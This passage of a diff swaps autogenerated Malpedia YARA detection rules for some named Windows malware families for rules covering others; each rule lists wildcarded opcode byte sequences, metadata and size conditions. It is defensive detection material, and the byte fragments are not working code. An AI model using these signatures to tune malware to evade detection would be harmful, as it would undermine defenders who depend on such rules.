-		$sequence_16 = { 6a01 6a02 ff15???????? 8985b8050000 6832a00000 }
-		$sequence_17 = { 8d0dca110000 48 8d15c3110000 49 c7c000010000 }
-		$sequence_18 = { 6800010000 68???????? 6a00 ff15???????? 6800010000 68???????? 68???????? }
-		$sequence_19 = { 8b5d00 894308 8b85f8070000 8b5d00 894304 }
-		$sequence_20 = { 90 81fb04030000 730d 90 }
-		$sequence_21 = { 90 8bbb97114000 90 8938 90 }
+		$sequence_0 = { 7515 8b4510 81784860504100 7409 ff7048 }
+		$sequence_1 = { c1f906 6bd038 8b45fc 03148d50614100 8b00 894218 }
+		$sequence_2 = { 7313 8a8788544100 08441619 42 0fb64101 }
+		$sequence_3 = { 83f81d 7cf1 eb07 8b0cc59c3a4100 894de4 }
+		$sequence_4 = { d1f9 51 57 8d4dbc e8???????? c745fc00000000 }
+		$sequence_5 = { 75f5 8b5dec 2bca 8b55e8 8bc3 }
+		$sequence_6 = { 8d5102 668b01 83c102 6685c0 75f5 8b5dec }
+		$sequence_7 = { 51 8d4da4 c745b400000000 c745b80f000000 c645a400 }
+		$sequence_8 = { ffb54cfdffff 6a02 e8???????? 837dd008 }
+		$sequence_9 = { 8d8d34fdffff ffb514fdffff 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Abcsync_Auto : FILE
+rule MALPEDIA_Win_Rarstar_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d5810457-8b12-50ce-8030-bdbd5a136267"
+		id = "18a386a5-5130-5703-978a-5323644a8d5c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.abcsync"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.abcsync_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rarstar_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "02ae937251ee063be53e02e33e98dc9b276f9fd2074f9431e5bc0ede2973fadf"
+		logic_hash = "731c9230a2c0993fe7a5be5efd272fc408168bba25b13288ff7847590ce53fc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122157,32 +122467,32 @@ rule MALPEDIA_Win_Abcsync_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bc232 2bc8 8d4107 410fb64c1afc 4898 }
-		$sequence_1 = { 41884afc 418d4916 f7e9 418bc9 c1fa04 8bc2 c1e81f }
-		$sequence_2 = { 6bc232 2bc8 8d4121 4898 420fb60c18 }
-		$sequence_3 = { c744243442015500 c744243847013200 c744243c4d004d00 c74424404e000100 e8???????? 488bc8 ff15???????? }
-		$sequence_4 = { 418bc9 4d8d521f c1fa04 8bc2 c1e81f 03d0 6bc232 }
-		$sequence_5 = { e8???????? 488d15ba940000 488d0dab940000 e8???????? 488b4308 833800 750e }
-		$sequence_6 = { 2bc8 8d4112 410fb64c1afe 4898 422a0c18 41884afe 4183f913 }
-		$sequence_7 = { 4c89442420 33c9 4533c0 ff15???????? 85c0 0f8e37040000 488b05???????? }
-		$sequence_8 = { 4903ce 85db 742a 4d8bc5 4c2bc1 0f1f4000 6666660f1f840000000000 }
-		$sequence_9 = { 8bc2 c1e81f 03d0 6bc232 2bc8 8d411c 410fb64c1afc }
+		$sequence_0 = { 8dbc2424020000 f3ab bf???????? 83c9ff }
+		$sequence_1 = { f2ae f7d1 49 8d44240c 2bca 51 50 }
+		$sequence_2 = { 50 ffd5 85c0 0f8445010000 8b442420 85c0 742f }
+		$sequence_3 = { 8bc6 5e c20400 81ec24030000 53 }
+		$sequence_4 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 25ff000080 }
+		$sequence_5 = { 33db 8a940c20010000 8a5c0c20 03c2 03c3 25ff000080 7907 }
+		$sequence_6 = { 7605 2bc1 83c003 8d14c500000000 b8abaaaaaa }
+		$sequence_7 = { f3ab bf???????? 83c9ff 33db 8d942424020000 f2ae f7d1 }
+		$sequence_8 = { 33db 8a940c24010000 8a5c0c24 03c2 03c3 }
+		$sequence_9 = { 52 50 68???????? 57 895c241c c744243802000000 }
 
 	condition:
-		7 of them and filesize < 348160
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Lazarloader_Auto : FILE
+rule MALPEDIA_Win_Tempedreve_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4eef2499-48c5-5b94-8dd0-29267a0265f8"
+		id = "9e025c63-22da-56b2-8f0f-12b35d9ea5db"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazarloader_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tempedreve_auto.yar#L1-L156"
 		license_url = "N/A"
-		logic_hash = "176d7f7f65178334e7677ff59a660edd6b016ed103feffa239e5ccc53e031e90"
+		logic_hash = "ff28ad4e45522fd6ad775c186581b049a8c3b1257f6ade7f519c8365bdcce952"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122196,32 +122506,38 @@ rule MALPEDIA_Win_Lazarloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48894de8 488945f0 488d15a0bd0000 b805000000 894520 894528 }
-		$sequence_1 = { 488bd7 4c8d05fecd0000 83e23f 488bcf }
-		$sequence_2 = { 33c0 b906020000 f3aa 33c0 66898424d0060000 488d8424d2060000 488bf8 }
-		$sequence_3 = { 488bc2 e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf120ba0100 }
-		$sequence_4 = { 4889842490000000 488b442470 0fb700 6689442432 488b442458 0fb74c2432 }
-		$sequence_5 = { 4885c9 7430 53 4883ec20 488d0563810000 }
-		$sequence_6 = { eb19 488d1dec1e0100 eb10 488d1df31e0100 eb07 488d1dd21e0100 }
-		$sequence_7 = { 4883ec20 e8???????? 488b05???????? 488d1da7710100 }
-		$sequence_8 = { e8???????? 89442460 33c9 e8???????? }
-		$sequence_9 = { 85c0 750d 488bcb e8???????? e9???????? 4c8d2557230100 }
+		$sequence_0 = { 0f8460020000 8b54242c 8bca c1e918 }
+		$sequence_1 = { 7511 f6c408 6a01 58 0f45c3 }
+		$sequence_2 = { 8b5d0c 8b4734 8b5110 03c3 3bd0 }
+		$sequence_3 = { 8a4102 24c0 3cc0 0f84d8010000 8a45fc }
+		$sequence_4 = { 8974242c ff15???????? 8d442428 68???????? }
+		$sequence_5 = { 6800800000 6a00 ff74243c ff15???????? ff742444 }
+		$sequence_6 = { 50 e8???????? 6a40 8d442464 }
+		$sequence_7 = { 59 c20c00 a1???????? 85c9 }
+		$sequence_8 = { 742e 8b4c2460 8b9610040000 2b542450 }
+		$sequence_9 = { 72c9 85c0 0f85a9090000 53 }
+		$sequence_10 = { 2bfb 75d7 8b8e14040000 8b16 }
+		$sequence_11 = { 7320 8d4d02 8be8 2b6c2428 8a0429 3a01 }
+		$sequence_12 = { 8b442404 8bc8 c1e903 8d440140 c20400 8b44240c }
+		$sequence_13 = { 740c 3b8e24040000 0f85c9000000 8b542430 }
+		$sequence_14 = { 0f85a9090000 53 8916 8d4e04 }
+		$sequence_15 = { 57 0fb6b90030cb00 d1c0 33c7 0fb6b90130cb00 d1c0 }
 
 	condition:
-		7 of them and filesize < 364544
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Usbferry_Auto : FILE
+rule MALPEDIA_Win_Grok_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bb46c52-bfd6-5303-a607-4235821612d8"
+		id = "ccf14bb2-6a3c-5675-9d8f-13b9833157ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.usbferry_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grok_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "246be59259afe1548e2a4d266237ef3554d233c2ef89881c3d19b399601a13ef"
+		logic_hash = "2243923e42742fbe3a7e4306a1c12f85ff68d294ee642e4a1bb4afaaacaacbf5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122235,38 +122551,32 @@ rule MALPEDIA_Win_Usbferry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7210 8982f8000000 8b92fc000000 e8???????? 8b15???????? }
-		$sequence_1 = { 8b5df0 8b5514 8b4510 3bc8 }
-		$sequence_2 = { 3bf0 7d1e 2bc6 50 6a30 53 894510 }
-		$sequence_3 = { e8???????? 83c40c e8???????? 8d4d0c }
-		$sequence_4 = { 83c40c 8b45cc e9???????? 8b55e0 52 ff15???????? }
-		$sequence_5 = { 8d95a8feffff 83c2ff 899594f5ffff 8b8594f5ffff 8a4801 888da2f5ffff 838594f5ffff01 }
-		$sequence_6 = { 8d8db0f7ffff 51 e8???????? 83c40c }
-		$sequence_7 = { 899588f5ffff 8b8598f5ffff 8a08 888da1f5ffff 838598f5ffff01 80bda1f5ffff00 75e2 }
-		$sequence_8 = { c7404441342411 c7404cdbd5c0fe c740604fcda240 c740640f690ebc c74068b065f747 c7406c4a06d5fe }
-		$sequence_9 = { 59 85c0 752e 6a09 }
-		$sequence_10 = { f20f101d???????? 0f28ca 56 57 33ff }
-		$sequence_11 = { 0f83ae000000 c64405e000 40 83f820 7cef }
-		$sequence_12 = { 51 6a00 8b5510 52 8b45e0 50 }
-		$sequence_13 = { 7504 33c0 eb54 85c9 740e }
-		$sequence_14 = { 6aff 8b8da0f7ffff 51 ff15???????? 8b95a0f7ffff }
-		$sequence_15 = { 8a02 8845df 8345d801 807ddf00 75ee 8b4dd8 }
+		$sequence_0 = { 8b4dfc 8b55fc 03513c 8955ec 8b45ec 8b4850 }
+		$sequence_1 = { 8b5110 8955d8 eb09 8b45fc 8b4808 }
+		$sequence_2 = { bf44646b20 57 6a24 50 8b35???????? ffd6 }
+		$sequence_3 = { 895df8 0f84c2000000 8b7508 3bf3 0f84b7000000 8b7d10 3bfb }
+		$sequence_4 = { 3998dc010000 74a2 68???????? 8d45dc }
+		$sequence_5 = { 7313 8b4dfc 8b148d98940100 3b550c 7502 }
+		$sequence_6 = { e8???????? eb1d 83fe08 720c ff7004 }
+		$sequence_7 = { e8???????? 8945ec 58 e8???????? 8945e8 837de800 750b }
+		$sequence_8 = { c685acfeffff63 c685adfeffff6b c685aefeffff50 c685affeffff61 c685b0feffff67 c685b1feffff65 c685b2feffff73 }
+		$sequence_9 = { 53 ff30 ffd6 893d???????? 33c0 5e 5f }
 
 	condition:
-		7 of them and filesize < 638976
+		7 of them and filesize < 84992
 }
-rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
+rule MALPEDIA_Win_Satana_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "557acb15-65a4-5ee1-85fd-aeddfe817272"
+		id = "ed6576e9-0bbc-54e1-95d8-b27f8b1348bf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vapor_rage_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satana_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "f25f99fbbd5c20118e31285e56e8f0280cb5b6b08bdd8f0f37cb8cec6e554ab7"
+		logic_hash = "b7981beec1674ab80a9c4719e1b8a6cb3eebb0c2a5e13afc377fa72d8a4a6216"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122280,32 +122590,32 @@ rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b55f8 81ca80000000 8955f8 6a04 }
-		$sequence_1 = { 52 8b45e8 50 e8???????? 83c408 ff65e8 8b4de4 }
-		$sequence_2 = { f27502 f2c3 f2e94e030000 55 }
-		$sequence_3 = { f2c3 f2e94e030000 55 8bec }
-		$sequence_4 = { 8945a4 8b55d4 52 e8???????? 83c404 }
-		$sequence_5 = { c745f004000000 8d4df0 51 8d55f8 52 }
-		$sequence_6 = { ff15???????? eb1e 8b4de4 51 ff15???????? }
-		$sequence_7 = { 746c 830d????????04 c705????????02000000 a900000008 7454 a9???????? }
-		$sequence_8 = { ff15???????? 8b4df8 81c900010000 894df8 }
-		$sequence_9 = { 32db 885de7 c745fcfeffffff e8???????? 84db 0f8564ffffff e8???????? }
+		$sequence_0 = { 8d8578ffffff 50 56 51 ffd7 8b4df0 6a00 }
+		$sequence_1 = { bfff000000 f7ff 8a8258fd4000 8845fe eb04 }
+		$sequence_2 = { 689f011200 56 ff15???????? 8bf8 897da8 }
+		$sequence_3 = { 50 ff15???????? be???????? e8???????? 0fb60d???????? 51 6a02 }
+		$sequence_4 = { 0f8418010000 68ff0f0000 8d85fdefffff 6a00 50 c685fcefffff00 e8???????? }
+		$sequence_5 = { 52 68???????? e8???????? a1???????? 83c408 6aff 6a01 }
+		$sequence_6 = { ff15???????? 8bce a3???????? 85c9 7412 8d9b00000000 }
+		$sequence_7 = { ebeb e8???????? e9???????? 8b45b8 85c0 7403 880437 }
+		$sequence_8 = { c745f478817e51 66c745f88500 e8???????? 8b15???????? 50 }
+		$sequence_9 = { 68???????? 57 8945e4 ffd3 }
 
 	condition:
-		7 of them and filesize < 296960
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Wonknu_Auto : FILE
+rule MALPEDIA_Win_Unidentified_112_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c22ecc6-5e07-568e-a954-bd5d4c46a783"
+		id = "bca61e0b-9af5-5227-9c81-6d76a750fd95"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wonknu_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_112"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_112_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "d8729848e6f29de29baa83d3d1b7a400fd076f81fa4553c7cf2ef20e4ee0bd77"
+		logic_hash = "bc9d9c0da4edb02fe1e586c7d9968e528daf3c2c022493f4878a3ccbbc90f116"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122319,32 +122629,32 @@ rule MALPEDIA_Win_Wonknu_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
-		$sequence_1 = { eb08 c6840550ffffff00 8d8550ffffff 50 e8???????? }
-		$sequence_2 = { 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
-		$sequence_3 = { 8d7e28 57 ff15???????? 8b4608 }
-		$sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb }
-		$sequence_5 = { f3a5 8bcb e8???????? 803b00 }
-		$sequence_6 = { 8bfc b901050000 f3a5 8bcb }
-		$sequence_7 = { c6840550ffffff00 8d8550ffffff 50 e8???????? }
-		$sequence_8 = { 53 56 57 6804140000 }
-		$sequence_9 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? }
+		$sequence_0 = { f20f70dbd4 660f70dbd4 660fdbda 660fd4c3 4883c002 4839c2 75d3 }
+		$sequence_1 = { e9???????? 0fb615???????? 84d2 0f8456fcffff 0fb6c2 83f801 0f8426010000 }
+		$sequence_2 = { eb7e b107 488955f0 884e01 c60603 3c02 723a }
+		$sequence_3 = { ff10 488b4500 488b5008 4885d2 488b7df0 488b4df8 7409 }
+		$sequence_4 = { eb10 eb0e 0fb7474c 0fb74df8 66894f4c 31db 89c1 }
+		$sequence_5 = { ff15???????? 488bbdc8040000 488b9d70050000 488b8d80050000 ff15???????? 4883bd9005000000 740d }
+		$sequence_6 = { 751c 83f801 0f8574ffffff b8ffffffff 4883c420 5b c3 }
+		$sequence_7 = { ffe0 41c684246001000001 4d8b742410 4d8b7c2418 488d8db0030000 e8???????? 488d8db0030000 }
+		$sequence_8 = { ffc8 418987fc280000 83f803 0f823efbffff 89c1 4c8d05ad431200 ba03000000 }
+		$sequence_9 = { eb56 0f10b708050000 488b9f08050000 48c7870805000003000000 4883fb03 0f8493000000 488d4da0 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 7317504
 }
-rule MALPEDIA_Win_Darkme_Auto : FILE
+rule MALPEDIA_Win_Mocton_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48faa238-7c8d-58c0-88b3-9aef8ec2075d"
+		id = "0eb53608-52dd-5157-b27a-400060a227c2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkme"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkme_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mocton_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "3cf45d3e46e2f9013414d4d68a45acd13e79993e633a174a46aa5a37d07153ec"
+		logic_hash = "ab360491efcec62323f6bd101f123d7a2664b6f36f37ac6acc5b7e8f64a1cf18"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122358,32 +122668,32 @@ rule MALPEDIA_Win_Darkme_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66c745b40000 8b4dd0 894d88 c745d000000000 8d55b4 52 8b45d8 }
-		$sequence_1 = { c745f8???????? c745fc00000000 8b7508 8b06 56 ff5004 8b7d0c }
-		$sequence_2 = { 89856cffffff c78564ffffff08000000 8d8564ffffff 50 8b4d08 83c134 51 }
-		$sequence_3 = { 8b4ddc 51 e8???????? 898520ffffff ff15???????? 8b55bc 52 }
-		$sequence_4 = { ff15???????? 898520ffffff 8d4dbc 51 8b9520ffffff 8b02 }
-		$sequence_5 = { 8b85ecfeffff 50 ff15???????? 89856cfeffff eb0a c7856cfeffff00000000 8d8d7cffffff }
-		$sequence_6 = { ff15???????? 8945d0 c745c808000000 8d4dc8 51 8b5508 }
-		$sequence_7 = { 68???????? ff15???????? 898574ffffff c745fc01000000 c745fc02000000 6aff ff15???????? }
-		$sequence_8 = { eb0a c78558feffff00000000 8d459c 50 8d4da0 51 }
-		$sequence_9 = { 8d55b0 52 8d4590 50 ffd6 50 8d8d10ffffff }
+		$sequence_0 = { b8ee2fba29 2b8540fdffff 898540fdffff eb59 8b8dc8fcffff 69c9360d54b3 33d2 }
+		$sequence_1 = { 8945e8 e9???????? 8b4dd4 83e901 894dd4 8b55d4 69d240107496 }
+		$sequence_2 = { 33c0 399570feffff 0f9dc0 338570feffff 8b8d70feffff 83e901 898d70feffff }
+		$sequence_3 = { 8b8518fcffff 2bc2 898518fcffff 6a01 8b4dc0 51 e8???????? }
+		$sequence_4 = { 250b378f61 3385e8fbffff 3385e8fbffff 8b8de8fbffff 83e901 898de8fbffff 85c0 }
+		$sequence_5 = { 8d840afae31ce1 8945c4 c745bc9d7d7759 c745ecf8eddc22 c745d8e052b31e 8b4dec 81f1995c274e }
+		$sequence_6 = { 50 8b0d???????? 51 e8???????? 83c408 c78550fbfffffb90ba4f c78518fbffff55263138 }
+		$sequence_7 = { 0faf45b8 0345b8 2345b8 8945b8 8b4db8 }
+		$sequence_8 = { 2b8594e9ffff 8b8d94e9ffff 8b9594e9ffff 83c201 899594e9ffff 3bc8 0f8c86000000 }
+		$sequence_9 = { 0f9dc1 81e1b0c00d60 740c 8b55f0 81e2803636b3 8955f0 eb1d }
 
 	condition:
-		7 of them and filesize < 1515520
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Unidentified_108_Auto : FILE
+rule MALPEDIA_Win_Mokes_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "91d0ee32-15d3-5f4b-b0c7-e219a3fb056f"
+		id = "c2ac2973-931f-5609-90a2-11e20fcc17b8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_108_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mokes_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "bc8d7e8276cd214c62a44b786052de8d0d6c82c70c52e7e29cb797627cab2825"
+		logic_hash = "4e4c9d74cc0d3144676404e81ee560de6bc14d4b048ed928b0226c3699c7f157"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122397,32 +122707,32 @@ rule MALPEDIA_Win_Unidentified_108_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d05c7580100 4a8b0ce8 42385cf938 7d4f 400fbece 4084f6 }
-		$sequence_1 = { 0f8493010000 488d2d3a100100 83635000 83632c00 e9???????? 48ff4318 837b2800 }
-		$sequence_2 = { 660feb0d???????? 4c8d0d44950000 f20f5cca f2410f590cc1 660f28d1 660f28c1 4c8d0d0b850000 }
-		$sequence_3 = { 7426 488d5540 803201 488d5201 41ffc0 488d4540 498bcc }
-		$sequence_4 = { 4c8d05a8310100 83e23f 488d14d2 498b04c0 f644d03801 }
-		$sequence_5 = { 488d1dd6db0100 458bc5 498bcc 48ffc1 4438040b 75f7 4885c9 }
-		$sequence_6 = { 458bc5 498bc4 90 48ffc0 44380401 }
-		$sequence_7 = { 0fb6557f 4889451f 83f201 488d05dbc90000 49c1e302 4889452f 03d2 }
-		$sequence_8 = { 488d9588000000 803201 488d5201 41ffc0 488d8588000000 }
-		$sequence_9 = { 7350 488bca 4c8d051d310100 83e13f 488bc2 48c1f806 }
+		$sequence_0 = { ff7204 8b5004 51 8bce e8???????? c644244c04 83c40c }
+		$sequence_1 = { ff37 8b4d58 e8???????? ff33 8b4d5c e8???????? 8b4d24 }
+		$sequence_2 = { f30fe6c0 f20f59cb f20f584850 f20f5cc8 f20f104660 f20f59c3 f20f584650 }
+		$sequence_3 = { f00fc101 ff742414 8d44242c 8bce 50 e8???????? 8d4c2428 }
+		$sequence_4 = { ff15???????? 85c0 7435 8d942494000000 8d4c2454 e8???????? c68424a802000004 }
+		$sequence_5 = { f6c444 7a10 f20f1025???????? f20f11642408 eb48 f20f5905???????? f20f11442408 }
+		$sequence_6 = { f6c202 743b 8b442440 83e2fd 89542428 8b08 85c9 }
+		$sequence_7 = { ff5014 5f 5e 8be5 5d c3 ff500c }
+		$sequence_8 = { ff7610 8d8f9c000000 e8???????? 85c0 7413 8bc8 c1e104 }
+		$sequence_9 = { ff5274 85c0 741b 807c241800 b820000000 b910000000 0f45c1 }
 
 	condition:
-		7 of them and filesize < 307200
+		7 of them and filesize < 18505728
 }
-rule MALPEDIA_Win_Bluehaze_Auto : FILE
+rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c7b5561-ee2d-5a06-a96a-4cc26ae71cec"
+		id = "f988a94d-ce66-5749-aa7b-8d72d93ac6d8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluehaze"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluehaze_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_ausov_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "108c6f0ac1c0898d4930ded73b9aadddbebc2ff25c5a1de920dfb159113df607"
+		logic_hash = "1e4b39bc03f6a1c14963eaf8f0b58843065ae625a870f162ccaf462590958318"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122436,34 +122746,34 @@ rule MALPEDIA_Win_Bluehaze_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 89856cfeffff c645fc24 85c0 742d 8b8d78feffff 68a4010000 }
-		$sequence_1 = { c745e80f000000 8945e4 8845d4 e8???????? 56 8d45d4 50 }
-		$sequence_2 = { e8???????? 83c404 33c0 c7467c0f000000 894678 884668 8bce }
-		$sequence_3 = { 897e14 c7461000000000 c60600 83c61c 3bf3 75d8 50 }
-		$sequence_4 = { 8b5604 8b5214 68???????? 83c604 50 8d857cffffff 50 }
-		$sequence_5 = { 85c0 7567 ff15???????? 3d6d270000 7573 8d856cfeffff 50 }
-		$sequence_6 = { 59 c3 8d8d60ffffff e9???????? 8d8d7cffffff e9???????? 8d8dd4feffff }
-		$sequence_7 = { 8d45ec 50 8bf1 ff15???????? 0fb755f4 8b4dec 69d2e8030000 }
-		$sequence_8 = { 83c408 8bc8 ff15???????? 8d4d80 51 8d8d08feffff }
-		$sequence_9 = { e9???????? 8d8d78fbffff e9???????? 8b542408 8d420c 8b8a04faffff 33c8 }
+		$sequence_0 = { 83c408 50 ff15???????? 8945f8 0f8407000000 }
+		$sequence_1 = { 8dbdfcfbffff 83c9ff 33c0 f2ae }
+		$sequence_2 = { 83c408 50 8b85f8fbffff 50 e8???????? }
+		$sequence_3 = { e8???????? 83c40c 85c0 754e 0f8407000000 }
+		$sequence_4 = { 50 68???????? ff15???????? 8985c4fdffff }
+		$sequence_5 = { e9???????? 8d8db0fbffff 51 8d9500feffff 52 }
+		$sequence_6 = { 83ad34faffff01 83bd34faffff00 7429 83ad34faffff01 83bd34faffff00 7448 e9???????? }
+		$sequence_7 = { 7429 83ad34faffff01 83bd34faffff00 7448 }
+		$sequence_8 = { 8b954cfaffff 3a4a01 7523 838548faffff02 83854cfaffff02 }
+		$sequence_9 = { b90d000000 33c0 8dbdc9fdffff f3ab }
 
 	condition:
-		7 of them and filesize < 424960
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Sedreco_Auto : FILE
+rule MALPEDIA_Win_Void_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79578107-84f9-5f01-8bf1-070f071e75ff"
+		id = "89398dc6-137f-5ec6-8d95-3834bc4f980c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sedreco_auto.yar#L1-L450"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.void"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.void_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "79e378080daf9957ad7b702ae6910bfba39dd77a995aedb850c5514668bb56cb"
+		logic_hash = "9f2df3bf5647831ce19a5214f5a12a4e7816575938889bc15e27938cfd4b8dad"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122475,73 +122785,30 @@ rule MALPEDIA_Win_Sedreco_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 89450c 56 85c0 }
-		$sequence_1 = { 8bec 51 836d0804 53 56 }
-		$sequence_2 = { c645ff30 e8???????? 85c0 7505 }
